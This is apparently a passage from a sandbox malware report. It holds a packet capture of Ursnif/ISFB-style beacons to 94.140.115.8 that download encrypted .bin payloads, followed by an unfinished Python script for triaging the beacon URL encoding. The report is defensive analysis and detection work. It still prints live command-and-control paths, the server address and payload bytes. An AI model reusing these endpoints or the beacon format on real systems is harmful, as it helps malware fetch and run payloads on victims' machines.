                            Data Raw: 82 b0 5a f9 80 5c 88 d2 b9 a9 03 66 fc cb 05 5a 55 e1 a3 0c 1d f4 74 76 10 8c be b1 96 6a c9 05 cb 3a 20 f7 40 97 8d cf 82 7e d8 63 47 d6 66 53 a2 b2 df 46 50 eb 66 05 3b 69 3c 4e e7 2d b7 c5 9a 11 b9 f1 b6 05 bd 93 ed 4a 54 06 08 f8 24 04 14 8b 92 a3 63 12 78 a9 c3 92 cb d4 7c 87 14 e4 63 d4 05 20 f9 3c 6a 5f f1 7e 65 84 63 e2 4e 82 6e 48 23 ef 28 da 52 05 8e fb 30 d8 02 06 d9 d3 14 82 03 b0 45 35 de 9c 1f 71 d0 9b 3a c9 80 0c 04 e9 c4 55 c2 8e 9b 6b 71 37 e2 ab 42 c6 3a 26 d7 99 03 87 ed 51 05 fb a8 a8 86 c5 a1 e5 48 fd 9b 55 b0 f2 2d 73 08 e3 2f 3a bb 98 30 78 3c 0f 13 bf 4c 26 40 74 75 92 a2 bf 07 20 f8 3f 0a 84 8a ab fc df cf 71 74 b4 60 79 99 09 2d 7f 82 52 87 b6 5b 77 e2 98 6c 4b 07 fc 75 8b 6f 2e 0c 46 a5 fb cb 29 1a fd d8 c3 8d d4 6e 88 55 e5 34 e2 23 de c9 96 57 7e 4d 02 39 75 cb 23 c3 1e b7 9a d8 de 82 90 27 64 d6 fb 51 22 ec 6d 93 97 e8 7d 81 8c 5e 56 ae a1 23 f9 43 ad c1 0e 4c 7e 2f f7 4a f9 22 7c 26 e9 77 05 f2 81 80 74 bc 08 25 7f 80 7f c4 eb 84 4c ac 58 d2 03 f0 4a 39 cc 31 80 de 78 83 47 b7 4e c4 b8 56 a8 ad 9c 7d 09 0a 70 63 f8 9f 4a 53 24 3f 4a c8 58 39 a2 b7 9c 4a ef 6e 4a 5b f4 22 58 ba 98 04 7a 10 d5 aa fe 88 33 0c e5 14 16 6f 60 a5 50 24 b4 2a 29 d7 6b f0 76 b1 e2 fd fc 14 f6 86 09 f4 cc d3 9d f7 2e fd 1f f4 a0 ca fe e7 27 dd 71 dd dd 64 b5 31 24 30 94 6c ba 10 fc 1c dc 1d bb e6 97 84 46 58 ca 9c e6 ed 19 10 f6 cf a1 08 89 ff c8 d5 aa 0e 42 31 98 56 c5 75 60 2d ab e7 b0 3d a1 48 ed 3e 89 1b 2c 21 10 57 45 6e 61 aa 8f a5 ad a1 66 2b e2 ac 70 4f 75 c1 65 d0 45 ef 80 32 2b 20 e4 d8 4a da ea 62 0b 77 45 56 1d 01 fe 80 42 8f 6b 26 4f 6c 1d 53 82 9a 60 a2 db 4f fe 2c 50 1a 2b d0 73 cc 11 05 db 08 70 85 06 1f 8b 9c ea 4c f8 36 5a 6e a6 0e e3 02 59 b7 d5 cd 3b 24 ed d7 bf 65 b2 8a 84 7c 35 da 68 c0 2e cc 63 4e 6c b6 71 9a 51 95 6a 9a e1 e1 78 fb 92 40 9d 77 c6 d0 9a 02 5e fd e5 ca 48 a1 d1 c9 3f 81 de 26 d8 62 71 f2 91 36 fd 34 7c d5 0e 3e 11 7a 05 b6 84 b3 01 33 13 f0 a5 86 ee 24 b7 1e 71 3d 73 98 0c 6b 3b b1 21 
28 04 71 0f da 1c 37 6e 5e 3f 29 06 e4 e0 6e c1 7d 2b a8 1e d9 fe e8 ae c8 27 e7 2f 17 f9 20 25 24 3f de 68 e7 f5 24 79 71 22 a2 52 95 43 c5 05 f4 4f 1b 7a a6 b9 2d c8 2a d5 3d 92 db 83 04 55 20 07 68 f7 3b 47 1a 47 62 e6 0a 9a ab c2 3a f9 95 2b 59 ff 50 44 c0 bd 3c d4 39 74 20 a7 fc bf d9 ab b2 a7 e4 4d ee 69 b4 4e 36 21 29 8a 39 0a ec 3b df 04 06 df 56 d4 10 92 74 a2 85 4c 1a d1 61 18 59 70 75 4e e9 ac 21 f0 9e e9 3c 7d 93 a9 4e ad 40 74 f0 cd 04 23 85 d8 62 16 75 5c 97 69 e3 16 65 d3 46 da 89 df 99 fb 57 32 2f b1 f2 35 24 bc d7 6d f5 01 bc ea fb a7 7d c5 d7 94 77 f9 50 ae 5d 7f 68 db 96 fa 5d 2d 47 68 bb 5d a9 41 93 11 90 87 87 82 32 7a ff 01 7a 72 5b b5 f2 b9 99 e6 32 1f 64 f2 b6 90 76 93 18 1b 0f ef 4c 57 80 cf 3a 59 8f b4 c3 d5 fc d2 cb c6 f9 01 4d c9 51 08 61 7a ad 91 e5 16 b0 ba 70 85 d9 7c 5d 96 9b 20 c5 23 f7 93 32 8d 34 8f 3d 39 c5 81 cf 4a 0b a6 f8 bc be 1b 3f 87 93 06 7c 29 ed 6a ba 6c 6a ff 37 9e 8d 30 81 6d e7 4e 8c 37 de f7 39 5f 8b 00 2f af 4d ea 56 2f 78 61 34 ce 07 d3 37 8b 51 99 02 dc 02 3f f4 31 de 2f 44 2f c5 e9
                            Data Ascii: Z\fZUtvj: @~cGfSFPf;i<N-JT$cx|c <j_~ecNnH#(R0E5q:Ukq7B:&QHU-s/:0x<L&@tu ?qt`y-R[wlKuo.F)nU4#W~M9u#'dQ"m}^V#CL~/J"|&wt%LXJ91xGNV}pcJS$?JX9JnJ["Xz3o`P$*)kv.'qd1$0lFXB1Vu`-=H>,!WEnaf+pOueE2+ JbwEVBk&OlS`O,P+spL6ZnY;$e|5h.cNlqQjx@w^H?&bq64|>z3$q=sk;!(q7n^?)n}+'/ %$?h$yq"RCOz-*=U h;GGb:+YPD<9t MiN6!)9;VtLaYpuN!<}N@t#bu\ieFW2/5$m}wP]h]-Gh]A2zzr[2dvLW:YMQazp|] #24=9J?|)jlj70mN79_/MV/xa47Q?1/D/
                            Apr 28, 2022 15:47:50.638118029 CEST  1158  IN  Data Raw: 8a b3 48 f9 13 42 87 27 09 62 c8 7d ce a5 fb b2 d7 64 a5 ea 44 e0 86 41 37 2a f5 fb ef 21 81 8f b1 63 e6 08 13 8e a3 e7 3d 4e e4 ba 38 87 56 fc 5b 52 20 5c 5f 8f 57 5c 9f f4 70 46 e3 c7 6d 4c de 3b 8e 0d 35 c6 4b 62 72 a7 c8 74 d1 2a 29 d7 27 c7
                            Data Ascii: HB'b}dDA7*!c=N8V[R \_W\pFmL;5Kbrt*)'{O&Wnua.?JPp'cI,t2"?j8x?(:D M>k,+4%<O4Ix$.kI%>+p(buk5ZBQ[K9g
                            Apr 28, 2022 15:47:50.638174057 CEST  1159  IN  Data Raw: a5 fc 54 33 2b 59 94 6c a3 67 b6 a2 fe 20 2f 26 ee 24 6c 37 28 7b f1 66 fd a2 fb c5 77 33 c5 65 75 87 b2 6e e6 df 91 80 cb e8 ed 8e 08 7b bf fa 52 be a4 28 f1 98 b2 cd 0d 31 fd e6 2d 43 e2 60 8f 29 7b 0f af 60 58 e3 ce 89 f2 42 10 6f 28 2f 6d 3c
                            Data Ascii: T3+Ylg /&$l7({fw3eun{R(1-C`){`XBo(/m<+}C;)!e!AY!Bh)E~0?XtX)^6p!lp;G:PtE%V .z6ycYl-9RI{|oR'-+]m\9.j.(T:
                            Apr 28, 2022 15:47:50.638236046 CEST  1160  IN  Data Raw: 88 92 c0 5d 63 28 b3 c0 87 35 9b 2d 54 1e 5c 8d aa 1d ac 55 72 32 8a 05 25 9e 34 4e 04 3b 0b 4c e3 42 e8 07 94 bf 8f 4f 8c 8e 45 39 6b d0 1f 26 87 e8 db 07 b1 2f f5 13 af f6 bc dd cf 2b 37 6b 9d 3f 33 e1 6e 15 8f 2d ef 0c 0b 61 3f e4 9b 5a d7 1b
                            Data Ascii: ]c(5-T\Ur2%4N;LBOE9k&/+7k?3n-a?ZFML7v1TG8n>>4Qr$OQUnUeXffsQ{.&/s~0JkV#(ht,P]\8'UuD:+@Vuswxqs<a%VA
                            Apr 28, 2022 15:47:50.638349056 CEST  1162  IN  Data Raw: ce 14 7c 64 29 63 70 16 4a 70 c5 0f 99 ef 4d 7b 9f ef 05 55 bf d8 cc 23 5b f4 59 93 7e 99 75 8f af 79 05 76 44 93 7d 41 18 48 db 7c 08 60 71 d8 3d d0 fe 64 8f c7 d2 1e db 96 64 4e 6a d7 08 fb 15 e3 e1 7e 36 8b 45 5e 0e 67 5f ab 1f 72 52 c2 5f 19
                            Data Ascii: |d)cpJpM{U#[Y~uyvD}AH|`q=ddNj~6E^g_rR_$1rtq1H_A+)J#-5lbIpY+J{*f3t{~t+$a4:Ix^dnym|/A8eLvNYru(:~a|R5YP
                            Apr 28, 2022 15:47:50.638394117 CEST  1163  IN  Data Raw: 8d ae cd 77 87 1c ff a7 3b 15 a0 4c 68 83 fa 42 af ae 6b 32 5f 56 7b ea 64 ee fc 78 a8 cc cc 5f a2 af 1f b1 90 ab ab af c6 48 e1 02 50 aa 1b d0 4f d8 ac e2 69 74 21 78 86 67 dd e7 40 b2 c6 e5 77 1d 01 31 68 39 f4 ab 72 92 37 33 c8 08 6d 4c 0c b4
                            Data Ascii: w;LhBk2_V{dx_HPOit!xg@w1h9r73mL/[eZ]sw6-zQ[R.]IojR:-7~"'6EecYp7$CKR|y<3xq`RMw]h]
                            Apr 28, 2022 15:47:50.638417006 CEST  1163  IN  Data Raw: 6f 97 14 38 b0 22 d5 bb f9 bd 62 03 fc 54 47 52 19 0b 8e c2 ea 35 54 6e a1 ba 40 d2 b2 55 fb 0e 22 81 f0 0e ac a4 1b b1 87 d2 55 25 54 22 af a7 bb c4 1b 84 71 7c 0a 7e c1 e2 6c d7 95 6b 73 28 cc ba 29 13 f6 bf e4 60 77 d1 8d 68 80 e7 00 83 ee 63
                            Data Ascii: o8"bTGR5Tn@U"U%T"q|~lks()`whcQG&b}9;v~!9&P+ y}]|r<8~;4KgAj
                            Apr 28, 2022 15:47:50.638451099 CEST  1165  IN  Data Raw: e8 62 c4 13 82 2d 0c 09 ca 9d 73 9e df e8 09 46 fc 58 56 65 c8 d9 43 69 92 18 42 03 d2 23 07 75 39 e8 9a 80 9c 7a 7a bf 64 df a6 f0 59 3b 02 3d 7b 5c e7 9a 94 e4 7e c7 e5 3e d8 ee 3c 28 48 7e ab 84 9a 35 ff 88 9b d0 09 ac c7 cd 49 0a 04 db de 9d
                            Data Ascii: b-sFXVeCiB#u9zzdY;={\~><(H~5I\B973^5?:hRa,cCtB|?V9zI][BRhXp4A'w_hgaK0`3*#:xQ95n5"py*tr+C
                            Apr 28, 2022 15:47:50.638581038 CEST  1166  IN  Data Raw: 86 6c da 52 f2 56 67 14 fe 19 5d 25 0b 9f 19 d9 48 4b d0 67 2f 85 a4 d5 bf eb 18 4e 58 f0 b7 07 c3 a8 94 4d b8 ce b9 25 f9 87 ea 52 8c d1 89 8a de 06 1b f2 e5 7f 31 cd 00 cb a8 3a 9c 9b 21 bd 78 97 31 29 be 29 53 2a 42 2f e2 6e a0 29 ad 32 e5 bb
                            Data Ascii: lRVg]%HKg/NXM%R1:!x1))S*B/n)2d3B@I#mEW+hE[!7pYscJHT`_&v ?5iwdnC,1!8WN/Ks]Pz[Y.*HXC-|
                            Apr 28, 2022 15:47:50.638623953 CEST  1168  IN  Data Raw: c6 3e 66 ea 7d 49 fa a7 ab 16 cb 95 0c 07 01 b6 25 f9 47 5d 14 4a 6b 4a 41 fa 1b 89 b5 5b 57 78 9d 29 1f 9f 13 d2 c0 e2 40 80 61 0d 5e 92 60 48 4f ee 8c 1c 4b d5 61 02 bf c5 3a e7 8d 5f 93 4e b0 3e 36 67 0b ea 7e f7 a6 35 28 c7 2e 49 8a ec 46 30
                            Data Ascii: >f}I%G]JkJA[Wx)@a^`HOKa:_N>6g~5(.IF0zOUF<^+oHPP>~y<!*;}v,HN[-Qs4Y,81:wi$N>7?#(H*:$0B(o@\O &-#:dq
                            Apr 28, 2022 15:47:50.726372004 CEST  1169  IN  Data Raw: 18 20 0c 7a 9f 2a e6 b1 a6 19 de b9 4c 14 cc a5 0b e0 d3 4d 75 75 b0 e3 c2 52 50 f0 be fd 05 e6 27 63 4a ec 92 fa f0 c0 d3 93 4d a0 a1 b6 30 30 7f 5b 7a 75 ad cf ba 88 f0 29 43 b3 01 32 0b 2b 2f 1f ae d0 8c 86 dc 01 9d eb 62 5e d3 3f 8b 19 c5 27
                            Data Ascii: z*LMuuRP'cJM00[zu)C2+/b^?')OZUVm}I%.~ 5[LN@#9P08qwgUM)dnwEHuB`6iZno;`fx\`pHhr):K^
                            Apr 28, 2022 15:47:51.337693930 CEST  1352  OUT  GET /drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 94.140.115.8
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Apr 28, 2022 15:47:51.747339010 CEST  1353  IN  HTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Thu, 28 Apr 2022 13:47:51 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 238744
                            Connection: keep-alive
                            Pragma: public
                            Accept-Ranges: bytes
                            Expires: 0
                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                            Content-Disposition: inline; filename="626a9b07a777c.bin"
                            Data Raw: 70 f4 cc a4 a7 b2 26 b8 47 5b c3 6f ba 9f ad f4 6d 09 c9 57 ca 26 0a 77 61 b4 3b a2 dc 3e 2d dc fd 52 b9 28 2b c3 ca b3 88 6b 09 50 34 4e d9 18 8a b3 b9 ea 6b 95 93 71 91 d0 67 6d da 30 3d 53 6b ad 1f b2 e4 21 61 9d 9c e8 01 f5 70 db a1 51 44 9d eb 06 74 37 e8 05 6e c4 e1 a8 80 15 fd ec 0e 03 b9 dc fa 2d 50 ee a3 6c 36 a5 49 32 9e 11 b1 03 6a f1 fd 61 b4 74 91 d3 39 cc 8a 37 0c f7 89 35 23 24 de 9c e5 f4 d0 53 67 76 5d ac 15 ba d7 f8 f7 17 47 af 20 21 18 84 71 2c 5e 58 a7 e5 54 70 ea 39 03 53 ec 37 54 63 29 79 4a 6b 98 5e df 82 31 70 9d f9 1e 0e e7 cb d9 d9 d6 44 5e b5 9b b0 0f a2 32 d3 24 de 19 f8 e6 3d 5c 70 ae d6 69 d8 ef 38 bf a9 45 b3 52 c4 f3 ad d1 72 10 f9 74 65 27 2f cf d9 d2 bf 06 a4 5c a8 67 ea 8e e9 cf 24 c0 9b c5 7f b0 fa b5 a3 f7 30 41 b6 ca ed c2 c7 ca ea 24 79 61 bc 3d 78 48 f6 55 e5 f2 1d 23 c7 5f 90 b0 50 64 f8 d4 0d e6 fe a3 fe 2e b4 05 f1 32 3e 84 f3 c5 fd ae ec 86 c7 d3 1d a0 ba a8 5d 08 54 69 80 4b 9e 82 1b 71 1f 32 75 a9 9b 9e e3 b1 a7 fa 45 22 0b 6e 03 37 5b 77 15 a8 c8 4a ae 08 d9 45 68 21 4b 27 cf ae 51 0e 2c 91 c7 7a b0 6b 32 16 59 ad 7c 06 7d be 87 77 0d d0 74 e3 01 69 49 e7 b2 bf 84 a2 fb a3 8e b5 67 93 36 21 63 89 14 83 44 74 60 ef ec d8 16 f6 d3 70 77 0f df 4f 09 3b b2 53 69 2a 32 c6 1f fa de 0d 26 ee f7 d2 54 64 fb 77 49 e2 a4 ca 2f 00 7d 94 1b 7d 93 96 63 02 99 55 cc ae 01 70 7d 40 46 e6 32 1b 9b 27 c7 33 85 3f 65 81 cb 20 23 2a 71 1a af 49 a6 07 49 3a 76 74 49 ae b1 2b 70 b1 83 02 59 72 a9 b0 6b 63 59 d6 9e 8d 07 9e 18 8b 6e 15 22 b0 a2 f6 d5 0c 9c 25 17 1e 55 b3 c5 b8 3f f2 4b 42 6e 6b 7b ec 7a 93 23 59 ae 71 57 ea 08 8d b3 47 d3 83 0d af 46 44 0c 89 06 1d 2b c5 b2 ed e7 9b 18 75 48 be e7 95 86 4d a9 f8 87 4a fe 74 0e 91 e1 bb 65 57 72 ec 1c ba 89 d0 f8 b7 db 3c e9 3e 12 68 53 8d 92 5f 43 38 d0 c3 bb f6 43 bc 18 04 34 95 3f a0 bb 80 98 cc 86 18 bf 26 33 44 c0 fd e4 04 74 73 81 ef 79 82 1b 1d 63 e1 12 94 64 48 8b fd 2e 1c ab ae 1e 25 46 96 33 57 55 98 f1 1b 26 1b 5e 9d 24 e2 52 83 df 1b 03 38 da 
fd dc 65 13 04 ee 6b 55 c4 9b b5 33 48 24 24 01 32 02 b0 f9 81 bf 43 11 4b 23 a9 54 40 87 82 f8 90 fe 49 58 95 6e b1 e5 b4 c2 15 3a 56 20 ee c6 de e5 7b f2 b1 47 ad 54 af ec bd 79 0b 72 4e 55 bc fc 33 9b db f9 f9 31 a5 fb cb 9e 93 e5 f4 c9 6b 53 e8 08 11 29 de 49 e0 b8 c2 2d c9 31 14 d6 88 30 af 91 61 cf 84 a3 65 4d a4 5f 29 83 a8 b1 86 5c 77 2b 4f 20 15 e5 ef 2b 55 81 0c ed ef 27 62 c7 59 80 7b 37 42 c8 db dc 61 ee 0b 37 6e 77 85 88 66 a5 1c 54 42 b1 29 83 ac af 1e 28 1e 25 f0 4e 09 d9 d6 44 2b 14 cf 64 17 d2 8f 61 26 36 e5 58 12 5f 42 12 54 8c 94 ba e0 1c a3 cc 79 fa 92 1a 85 80 f4 8f 14 f1 75 f3 2f 9e ed 86 0f 60 77 6b ce 41 2a e7 ed 06 b1 c2 19 eb 73 7f d0 1e d3 9e 34 89 ed f0 cd b6 6c 73 20 ed 09 90 b8 67 a1 bc ca 3b 1a b8 f3 73 01 01 9e 53 e5 cc 5c 95 cd 18 0b 87 e1 27 52 20 23 2f 08 fd cd 23 3d 55 41 95 b0 ad fe b4 f9 e3 a8 b0 71 6e ea 23 f2 b1 3e a6 e6 d9 f4 ab 2f cc f7 48 bc 42 cc 1c e2 87 f5 6f 13 a6 48 34 ff b8 64 5f ae 65 30 50 13 ec 22 34 58 69 d1 0e f6 80 92 36 f6 de 70 f7 9e 42 bd 59 04 89 3e 27 df c7 52 0f 10 05 2b 93
                            Data Ascii: p&G[omW&wa;>-R(+kP4Nkqgm0=Sk!apQDt7n-Pl6I2jat975#$Sgv]G !q,^XTp9S7Tc)yJk^1pD^2$=\pi8ERrte'/\g$0A$ya=xHU#_Pd.2>]TiKq2uE"n7[wJEh!K'Q,zk2Y|}wtiIg6!cDt`pwO;Si*2&TdwI/}}cUp}@F2'3?e #*qII:vtI+pYrkcYn"%U?KBnk{z#YqWGFD+uHMJteWr<>hS_C8C4?&3DtsycdH.%F3WU&^$R8ekU3H$$2CK#T@IXn:V {GTyrNU31kS)I-10aeM_)\w+O +U'bY{7Ba7nwfTB)(%ND+da&6X_BTyu/`wkA*s4ls g;sS\'R #/#=UAqn#>/HBoH4d_e0P"4Xi6pBY>'R+
                            Apr 28, 2022 15:47:52.636763096 CEST  1605  OUT  GET /drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 94.140.115.8
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Apr 28, 2022 15:47:53.034704924 CEST  1606  IN  HTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Thu, 28 Apr 2022 13:47:53 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 1865
                            Connection: keep-alive
                            Pragma: public
                            Accept-Ranges: bytes
                            Expires: 0
                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                            Content-Disposition: inline; filename="626a9b08ef40f.bin"
                            Data Raw: 13 c8 48 02 7e 92 9b 44 9c 80 e3 6e 2a f8 f3 75 79 58 37 d9 61 c6 1b e4 d8 93 7d 37 75 01 12 d2 d0 2b 2f 69 5d ac 0d 29 e1 ed 10 b5 cc ea 27 9f ad 49 81 4e 50 ac 8e da db 88 93 13 bd ea a0 ec 3a c4 3a 5b ef b7 d0 7f 06 cc 90 ad 9b e9 95 fa 32 b7 86 e9 8c 81 89 a6 d6 ba b9 9a c2 3c 39 70 b2 23 b3 5a b8 27 98 32 fe 60 3b 8c ad a1 c0 68 98 99 41 b6 e0 0b 1b bb 99 3b 8f b1 77 50 75 d9 fb b6 0d 7e e6 78 02 36 bf f9 4b e5 d9 7e b7 8f 03 ed 31 a3 a0 dd 16 d3 d3 f1 bd b1 11 8e 79 1a b6 14 10 d4 33 de 12 80 68 4e e5 8d 21 73 47 45 58 98 ba 2f ea bb d0 df 50 d3 4f de 07 ba dd 02 ca 88 47 9e b5 32 3f 2c 9d 03 8e 52 93 26 2f f6 92 ad 4e bf a1 80 42 37 3f d2 48 0b fb 88 54 e8 12 ed de 44 ee 93 07 f1 bc 5a 5f a3 f5 49 94 dc 1d 82 bf 3f d3 7e e1 d7 76 1c 3b b8 f1 06 b5 fe 86 c1 aa b9 65 bf f7 0e 75 3d e5 ef b2 c8 ee f3 b1 3a 50 b6 be 3e aa 47 82 8c cc b2 22 fb 1b 03 33 6d 86 a3 c8 3c b7 38 0c db 03 96 2b 3f 45 85 3e fc 1d 8e 9f 93 bb 52 dd 88 95 a3 e0 f6 33 5e a8 1c 24 46 36 9c a6 73 40 3d 18 6c a5 08 c5 af 02 57 15 e4 80 67 47 df e9 71 c1 14 6f 02 a7 80 8b c8 6e d2 e0 57 d4 7c c1 3a b7 99 9d db 11 c3 47 2a 12 77 cf d9 5b 06 b5 f9 bd 01 2f ec 21 db a8 ce 75 f5 3a 04 5e 14 b6 51 27 8f 16 49 94 da 77 1d bd cd 5e 4a 4b 7d d1 e3 f4 3f 5c 1a 33 7e 91 5f 94 c0 41 07 68 9d cd 6b 72 e4 34 18 1c f3 72 6e a1 d4 b9 1c 49 84 6c 47 11 f3 57 f0 54 32 2e 0b 32 96 ed 10 ae 5b fa 0d 16 80 3d 6a bb d3 d2 82 2c 91 c4 0a 2e 48 32 f6 04 a4 94 d8 ba d6 89 b4 5b 09 d5 6b 54 11 8b 98 73 26 24 d1 68 bc 3c 20 27 6c 5b a7 b2 63 47 4a d8 6e e2 04 da 17 97 b0 18 45 db da 03 19 16 c7 62 30 10 c4 db c2 36 68 bc 0b 32 e3 62 33 04 59 93 ca 45 8d cc 6b c0 b3 74 59 f4 b3 aa 69 25 00 99 62 4a e6 72 12 59 26 0e 89 0a 46 38 77 84 d7 88 ee 0a a2 30 c6 13 91 f1 9e 97 39 a0 f9 c5 6f a7 f6 f9 37 d6 82 09 48 ec fe 48 99 47 76 55 ff 87 fe 03 2d 24 ec f8 ef 59 35 71 40 63 5a 0f c0 08 c0 8b f7 2e a4 db ed ff 91 8e 4d a9 4b 2c cc 12 ad ca dc 93 7a b3 43 11 23 9d 51 b0 bc 04 7a 86 43 7c be 
41 f3 ec 95 d3 8d 10 44 9e ef 4f d1 3f 39 52 bb fd ba 1f 85 d1 f5 10 0b f2 cc e3 34 80 b6 b1 d3 b2 32 79 5a 61 ee b3 db 2d 78 90 06 dd 27 09 6d 1a a9 d7 3b 68 06 2b 51 e8 37 64 6f 76 ab 6b 22 bc 5e 6a 23 99 a3 ff 69 96 ba 18 c4 de 8a 4e a4 44 d5 ce 2e 9d 1b 7b 65 84 e1 e6 8d 03 cb 97 bf 64 a4 2d e2 b2 5e 29 45 2f ef 7c 73 73 91 74 fa 22 a2 ef 15 d8 6e 6e 09 d8 2b 09 34 b4 3c 40 20 94 ee fc fc bf 6c 46 77 69 94 c4 c1 a8 87 f6 3e da 26 96 ff 17 f5 8e a9 39 46 eb d5 c5 b8 b1 ba e9 cb 87 cd 47 49 dd e2 0a ac 88 65 a5 6e e1 ca 3b 35 f9 fb 96 f3 0a ba 02 ab 15 78 ed 40 43 75 df f0 82 f3 db 02 6e 23 5f 8d de 35 c7 c4 68 86 8a 5f 86 fe f1 6b e8 d0 b9 e7 50 4a 3e 35 3e a4 83 e3 9b 59 9e d0 cf 15 9a a4 1d 3c b7 a0 26 bf 82 c4 85 7c 6c 80 8d 0e 28 71 35 ab 2d 6b 0e ec 33 f4 86 8a 57 14 62 be 9f 01 e5 4a 67 75 58 c5 47 1b 0c 8c 41 ac 32 92 39 77 2a ee 89 69 b9 48 1e e1 84 ca 23 7a 77 5d 43 ad c0 b0 41 93 aa 01 84 86 54 fc 2f 43 a4 79 9a 69 b6 f1 33 3a a0 c0 7e 7f e0 68 38 c5 24 cb 33 4f c7 3f 42 b6 32 74 86 68 aa f9 98 9e 9e 44 e4 84 d9 e4 93 32 51 f2
                            Data Ascii: H~Dn*uyX7a}7u+/i])'INP::[2<9p#Z'2`;hA;wPu~x6K~1y3hN!sGEX/POG2?,R&/NB7?HTDZ_I?~v;eu=:P>G"3m<8+?E>R3^$F6s@=lWgGqonW|:G*w[/!u:^Q'Iw^JK}?\3~_Ahkr4rnIlGWT2.2[=j,.H2[kTs&$h< 'l[cGJnEb06h2b3YEktYi%bJrY&F8w09o7HHGvU-$Y5q@cZ.MK,zC#QzC|ADO?9R42yZa-x'm;h+Q7dovk"^j#iND.{ed-^)E/|sst"nn+4<@ lFwi>&9FGIen;5x@Cun#_5h_kPJ>5>Y<&|l(q5-k3WbJguXGA29w*iH#zw]CAT/Cyi3:~h8$3O?B2thD2Q
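The three requests above share the shape that Ursnif/ISFB beaconing is known for: a fixed first directory, a long base64 body chopped into pseudo-directories at random points, the characters `+`, `/` and `=` rewritten as `_2B`, `_2F` and `_2D`, a throwaway file extension, and a User-Agent claiming MSIE 8.0 on Windows NT 10.0, a browser that never existed on that OS. The script below is an added triage example, not part of the Joe Sandbox report and not Ursnif's own code: it undoes the path encoding far enough to recover the ciphertext length and scores each request on those traits. It assumes that the first segment (`drew` here) is the operator-configured prefix, that `.jlk` is a per-campaign choice rather than a fixed marker, and that the request body is Serpent-encrypted in 16-byte blocks as documented for ISFB; the report does not state the cipher, and the key lives in the malware configuration, so no decryption is attempted. The request lines are copied from the session above; the benign request is constructed as a negative control.

```python
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Requests 1 and 3 of the session above, copied from the report (request line
# plus the two headers the scoring looks at).
CAPTURED_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
CAPTURED: List[Tuple[str, Dict[str, str]]] = [
    ("GET /drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk HTTP/1.1",
     {"User-Agent": CAPTURED_UA, "Host": "94.140.115.8"}),
    ("GET /drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk HTTP/1.1",
     {"User-Agent": CAPTURED_UA, "Host": "94.140.115.8"}),
]
# Constructed negative control; not from the report.
BENIGN: Tuple[str, Dict[str, str]] = (
    "GET /static/js/app.min.js HTTP/1.1",
    {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                   "(KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36",
     "Host": "example.test"},
)

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")
BLOCK_SIZE = 16  # assumption: ISFB's Serpent request encryption, 16-byte blocks


def request_path(request_line: str) -> str:
    """'GET /a/b HTTP/1.1' -> '/a/b'."""
    return request_line.split(" ", 2)[1]


def decode_isfb_path(path: str) -> Dict[str, object]:
    """Undo ISFB's path encoding: drop the configured prefix (assumed to be the
    first segment) and the file extension, remove the random '/' separators,
    then map _2B/_2F/_2D back to '+', '/' and '='.  Reports whether the result
    is clean base64 and how long the ciphertext is; the Serpent key from the
    malware config would be needed to go further."""
    segments = [s for s in path.split("/") if s]
    info: Dict[str, object] = {"ok": False, "segments": len(segments),
                               "substitutions": 0, "ciphertext_len": 0, "b64": ""}
    if len(segments) < 2:
        return info
    body = segments[1:]
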